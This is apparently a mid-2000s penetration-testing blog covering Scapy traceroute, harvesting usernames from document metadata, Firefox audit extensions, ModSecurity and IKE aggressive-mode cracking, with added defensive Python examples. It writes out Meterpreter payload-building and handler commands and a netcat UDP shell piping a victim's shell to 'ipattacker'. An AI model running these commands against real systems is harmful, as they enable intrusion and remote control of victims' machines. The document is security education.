Saturday, May 20, 2006

2D and 3D traceroute with Scapy

I was trying Scapy's graphical traceroute features, and I liked both of them, the 2D and the new 3D traceroute output.

Let's do a basic traceroute:

>>> mytrace, err = traceroute(["www.google.com"])

And the classic output is this:

>>> mytrace.show()
216.239.51.99:tcp80
1 192.168.1.1 11
2 87.219.30.1 11
3 10.255.136.254 11
4 10.255.228.1 11
5 10.255.228.2 11
6 208.175.154.177 11
7 195.2.10.122 11
8 195.2.10.129 11
9 195.66.226.125 11
10 72.14.238.253 11
11 66.249.95.146 11
12 216.239.49.34 11
13 66.249.94.235 11
14 72.14.238.232 11
15 72.14.238.97 11
16 66.249.95.149 11
17 72.14.239.17 11
21 216.239.51.99 SA
23 216.239.51.99 SA
24 216.239.51.99 SA
26 216.239.51.99 SA
29 216.239.51.99 SA
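A small parser for that text output, added here as an example (it is not part of Scapy or of the original post). It reads the show() rows back into structured hops: the "11" column is the ICMP type (time exceeded) sent by an intermediate router, and "SA" is the TCP flags of the target's SYN-ACK. From that it reports the TTL at which the target first answered, the TTLs that got no reply, and which intermediate hops are RFC 1918 addresses (an ISP's internal addressing showing through). The sample text is a shortened, constructed version of the output above.

```python
import ipaddress
import re

# Constructed sample in the format of TracerouteResult.show(): a header line
# "target:tcpPORT", then "TTL host answer" rows. Shortened from the trace above,
# with TTL 4 left out to show a hop that never replied.
SAMPLE_OUTPUT = """\
216.239.51.99:tcp80
1 192.168.1.1 11
2 87.219.30.1 11
3 10.255.136.254 11
5 208.175.154.177 11
6 216.239.51.99 SA
8 216.239.51.99 SA
"""

ROW_RE = re.compile(r"^\s*(\d+)\s+(\d{1,3}(?:\.\d{1,3}){3})\s+(\S+)\s*$")


def parse_trace(text):
    """Return (target_ip, port, rows); rows are (ttl, replying_ip, answer)."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    target, _, proto_port = lines[0].partition(":")
    port = int(re.sub(r"\D", "", proto_port))  # "tcp80" -> 80
    rows = []
    for line in lines[1:]:
        m = ROW_RE.match(line)
        if m:
            rows.append((int(m.group(1)), m.group(2), m.group(3)))
    return target, port, rows


def summarize(text):
    """Interpret the rows: "11" is ICMP type 11 (time exceeded) from an
    intermediate router; any other answer coming from the target itself
    (here the "SA" flags of its SYN-ACK) means the probe reached it."""
    target, port, rows = parse_trace(text)
    reached_at = next((ttl for ttl, ip, ans in rows if ip == target and ans != "11"), None)
    seen = {ttl for ttl, _, _ in rows}
    # TTLs below the first target answer that produced no reply at all
    silent = sorted(set(range(1, reached_at)) - seen) if reached_at else []
    # Intermediate hops using RFC 1918 space (private addressing of the carrier)
    private = [(ttl, ip) for ttl, ip, _ in rows if ipaddress.ip_address(ip).is_private]
    return {
        "target": target,
        "port": port,
        "rows": len(rows),
        "reached_at_ttl": reached_at,
        "silent_ttls": silent,
        "private_hops": private,
    }


if __name__ == "__main__":
    print(summarize(SAMPLE_OUTPUT))
```

Run it as a script and it prints the summary for the constructed sample; feed it the text of your own `mytrace.show()` output to get the same breakdown.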

Now if we want to create a 2D image of the results we just do this:

>>> mytrace.graph(target=">mytrace.svg")

Better for understanding ;)

And finally, the 3D output:

>>> mytrace.trace3D()

Cool! If you right-click on any host, Scapy will scan ports 80, 22, 21, 23, 25 and 443.

I think the 2D output is more useful, but the 3D one is so cool...

You can download Scapy from http://www.secdev.org

Thursday, May 11, 2006

Extracting Deep Information

I was looking for a way to get more information about my targets, something that could be useful
in a penetration test. One valuable thing is valid user accounts, so how can I get more
potential accounts? One way is harvesting email addresses from the search engines, but this is old and I wanted more; another way is to extract metadata from the target's public documents.

How can I accomplish that? Basically by extracting the metadata from the documents.

Metadata is literally "data about data": information about another set of data. [wikipedia]
For example, in the metadata we can find the author name, the software used with the document, who made the last change, and even the MAC address of the machine where the document was created.

Great, but what we really want are usernames, so the most valuable field is Author. So I thought: why don't we use the power of Google to find what public documents a company has, download them and extract the information we need?

To extract metadata I'm using GNU libextractor; it supports
a lot of file formats. And recently I came across wvware, which is used to access Microsoft Word files; the difference is that with wv we can access version control information, like in the document Michal Zalewski wrote about finding "recorded changes ranging from very minor (spelling, changed dates, slight reformatting, rewording to avoid being sued)"; he did all the tests on the Microsoft website (lcamtuf-strikeout).
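As an added example of the same check on modern Office files (this is not the post's tooling, which uses libextractor and wvware on legacy .doc): a .docx is a zip package whose docProps/core.xml part holds dc:creator and cp:lastModifiedBy, the fields that leak account names. The package and its core.xml below are constructed inline, so nothing is read from disk. A defender can run the same extraction over documents before publishing them to see exactly what a pre-publication scrub has to remove.

```python
import io
import xml.etree.ElementTree as ET
import zipfile

# Namespaces used by the OOXML core-properties part
NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "dcterms": "http://purl.org/dc/terms/",
}

# Constructed core.xml: the values are made up for this example
CORE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties"
 xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/"
 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
 <dc:title>Quarterly report</dc:title>
 <dc:creator>jdoe</dc:creator>
 <cp:lastModifiedBy>CORP\\asmith</cp:lastModifiedBy>
 <cp:revision>7</cp:revision>
 <dcterms:created xsi:type="dcterms:W3CDTF">2006-05-01T09:00:00Z</dcterms:created>
 <dcterms:modified xsi:type="dcterms:W3CDTF">2006-05-10T17:30:00Z</dcterms:modified>
</cp:coreProperties>
"""

# Property name -> element path inside core.xml
FIELDS = {
    "title": "dc:title",
    "author": "dc:creator",
    "last_modified_by": "cp:lastModifiedBy",
    "revision": "cp:revision",
    "created": "dcterms:created",
    "modified": "dcterms:modified",
}


def build_package(parts):
    """Build a minimal zip package in memory from {path: content} (constructed sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for path, content in parts.items():
            z.writestr(path, content)
    return buf.getvalue()


def extract_core_properties(docx_bytes):
    """Read docProps/core.xml from an OOXML package; {} if the part is absent."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        try:
            root = ET.fromstring(z.read("docProps/core.xml"))
        except KeyError:
            return {}
    props = {}
    for name, path in FIELDS.items():
        el = root.find(path, NS)
        if el is not None and el.text:
            props[name] = el.text.strip()
    return props


def leaked_identities(props):
    """The fields that name a person or account: what a scrub must clear
    before the document goes on a public web site."""
    return {k: v for k, v in props.items() if k in ("author", "last_modified_by")}


if __name__ == "__main__":
    sample = build_package({"docProps/core.xml": CORE_XML})
    props = extract_core_properties(sample)
    print(props)
    print("identities exposed:", leaked_identities(props))
```

The same core.xml layout is shared by .xlsx and .pptx packages, so the extractor works unchanged on those; legacy binary .doc files need a different parser, which is what the wv tools provide.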

If you have any other ideas, please write me a few lines to discuss the topic.

That's all, stay tuned.. :)

Wednesday, October 26, 2005

Using Meterpreter as a standalone utility

Post-exploitation techniques are a cool topic. These days I read a thread on the Metasploit mailing list
about using the Meterpreter payload as a standalone utility: for example, after exploiting a SQL injection you can upload Meterpreter and work through it. Well, here is a fast example of how to achieve this.

To create the meterpreter server:

$ msfpayload win32_bind_meterpreter LPORT=4321 X > met.exe

Copy this executable to the target system and find some way to execute it.

After executing it, you can use the "payload_handler" exploit to connect
and interact with it:
$ msfcli payload_handler PAYLOAD=win32_bind_meterpreter LPORT=4321 RHOST= E

I haven't had time to test it, but I think it works.

This is great for Windows; if the target system is Unix you could rely on S.E.L.F. (Shellcode ELF Loader), another approach to the same objective, post-exploitation. I recommend taking a look at the S.E.L.F. Phrack article.

Sunday, October 2, 2005

Mozilla Firefox extensions for the pentester

Here I will list some of the most useful extensions for doing application audits or pentests using Mozilla Firefox:

LiveHTTPheaders:

* Lets you edit request headers and replay a URL. Look for the Replay button in the live window! Very useful ;)
http://livehttpheaders.mozdev.org/

Web Developer Tools:
* Excellent tool that lets you do a lot of things, a must have. It turns the browser into a complete development tool.
https://addons.mozilla.org/extensions/moreinfo.php?id=60

Switch Proxy Tools:
* This extension allows you to define a list of proxies and switch between them on the fly with a button, very fast! Tor, Paros, Burp, WebScarab, JAP.
https://addons.mozilla.org/extensions/moreinfo.php?id=125

Tamper Data:
* Use Tamper Data to view and modify HTTP/HTTPS headers and POST parameters. Trace and time HTTP requests/responses.
https://addons.mozilla.org/firefox/966/

Spiderzilla:
* A front end for HTTrack; you can create website mirrors from the browser.
https://addons.mozilla.org/addon.php?id=1616

Slogger:
* Slogger creates a complete log of your browsing history. It can save every page using the same options as the "Save Page As" command, as well as saving a customizable plain-text history file.
https://addons.mozilla.org/extensions/moreinfo.php?id=143

Add n Edit Cookies:
* A cookie editor that allows you to add and edit "session" and saved cookies.
https://addons.mozilla.org/firefox/573/

If you know another interesting plugin, please share ;)

Friday, May 27, 2005

ModSecurity: Application Firewall

I wrote an article about ModSecurity, an Apache module that works as an application firewall. The paper is written in Spanish because of the lack of Spanish documentation about it. I wrote it for a monthly publication of the company I work for.

You can get it at:
HTML Version: http://www.isecauditors.com/es/iseclab4.html
PDF Version: http://www.isecauditors.com/downloads/artic/iseclab4.pdf

Enjoy

Thursday, May 12, 2005

Ike Aggressive Mode Cracking

If you are doing a pentest and you find a VPN server, there is a chance that it supports Aggressive Mode, so what could we do?

1- Use IKEProbe to check if the server supports Aggressive Mode: ikeprobe ipserver
2- If we are lucky and there is a match, then we have to configure a VPN client (SafeNet, for example) with the information we have; we don't have the pre-shared key, but that doesn't matter, it is what we are looking for.
3- Before firing up the VPN client, we have to set Cain to sniff the network traffic.
4- After the failed attempt Cain will have sniffed the pre-shared key hash; now we send it to the Cain cracker.
5- Then we can launch a dictionary attack and, if it fails, try a brute-force attack. We have to wait and wait... until the password is revealed.
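From the defender's side, the thing to catch is the aggressive-mode exchange itself. The added example below (it is not from the post or from any tool it names) parses the fixed 28-byte ISAKMP header found at the start of every IKEv1 UDP/500 payload and flags exchange type 4 (Aggressive) on the first message of an exchange, where the responder cookie is still all zeros. The sample packets are constructed in the block. The mitigation is to disable aggressive mode with pre-shared keys on the VPN server; an alert from a check like this tells you whether anyone is probing for it.

```python
import struct

# ISAKMP header (RFC 2408, section 3.1): initiator cookie (8), responder cookie (8),
# next payload (1), version (1), exchange type (1), flags (1), message ID (4), length (4)
ISAKMP_HDR = struct.Struct("!8s8sBBBBII")

EXCHANGE_TYPES = {
    1: "Base",
    2: "Identity Protection (Main Mode)",
    3: "Authentication Only",
    4: "Aggressive",
    5: "Informational",
}
AGGRESSIVE = 4
IKE_PORT = 500


def parse_isakmp_header(payload):
    """Decode the fixed header; None if the payload is too short to be ISAKMP."""
    if len(payload) < ISAKMP_HDR.size:
        return None
    icookie, rcookie, next_payload, version, xtype, flags, msg_id, length = ISAKMP_HDR.unpack_from(payload)
    return {
        "initiator_cookie": icookie.hex(),
        "responder_cookie": rcookie.hex(),
        "next_payload": next_payload,
        "version": f"{version >> 4}.{version & 0xF}",
        "exchange_type": xtype,
        "exchange_name": EXCHANGE_TYPES.get(xtype, f"unknown({xtype})"),
        "flags": flags,
        "message_id": msg_id,
        "length": length,
        # The very first message of a phase-1 exchange has no responder cookie yet
        "first_message": rcookie == b"\x00" * 8,
    }


def build_isakmp(xtype, rcookie=b"\x00" * 8, body=b""):
    """Construct a sample packet: a bare header plus an optional body. In real
    traffic the body carries the SA, KE, nonce and ID payloads."""
    hdr = ISAKMP_HDR.pack(b"\x11" * 8, rcookie, 1, 0x10, xtype, 0, 0, ISAKMP_HDR.size + len(body))
    return hdr + body


# Constructed "capture": (source IP, destination UDP port, UDP payload)
SAMPLE_PACKETS = [
    ("192.0.2.10", IKE_PORT, build_isakmp(2)),                          # main mode, first message
    ("198.51.100.7", IKE_PORT, build_isakmp(AGGRESSIVE)),               # aggressive mode, first message
    ("198.51.100.7", IKE_PORT, build_isakmp(AGGRESSIVE, b"\x22" * 8)),  # later message of that exchange
    ("203.0.113.3", IKE_PORT, b"\x00\x01"),                             # truncated junk, not ISAKMP
    ("203.0.113.3", 4500, build_isakmp(AGGRESSIVE)),                    # wrong port for this check
]


def find_aggressive_initiations(packets):
    """Return (source IP, initiator cookie) for every aggressive-mode initiation,
    so each probing peer is reported once per exchange rather than per packet."""
    hits = []
    for src, dport, payload in packets:
        if dport != IKE_PORT:
            continue
        hdr = parse_isakmp_header(payload)
        if hdr and hdr["exchange_type"] == AGGRESSIVE and hdr["first_message"]:
            hits.append((src, hdr["initiator_cookie"]))
    return hits


if __name__ == "__main__":
    for src, cookie in find_aggressive_initiations(SAMPLE_PACKETS):
        print(f"aggressive-mode IKE initiation from {src} (initiator cookie {cookie})")
```

NAT-T moves IKE to UDP/4500 with a four-byte non-ESP marker ahead of the header; the check above deliberately only looks at plain UDP/500, so extend the port test and skip the marker if your VPN is behind NAT.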

That's all

Netcat Udp shell

Here is a little memory aid for one use of Netcat: a UDP shell.

On the attacker:
Terminal 1: nc -lun -p 4444
Terminal 2: nc -lun -p 5555

On the Victim:
echo "" | nc -un ipattacker 4444 | nc -un ipattacker 5555

So you type the commands on Terminal 1 and you receive the output on Terminal 2.
This also applies to TCP.

Wfuzz 2.2.0 released

I'm pleased to announce a new version of Wfuzz! Wfuzz has been created to facilitate the task of web application assessments and it...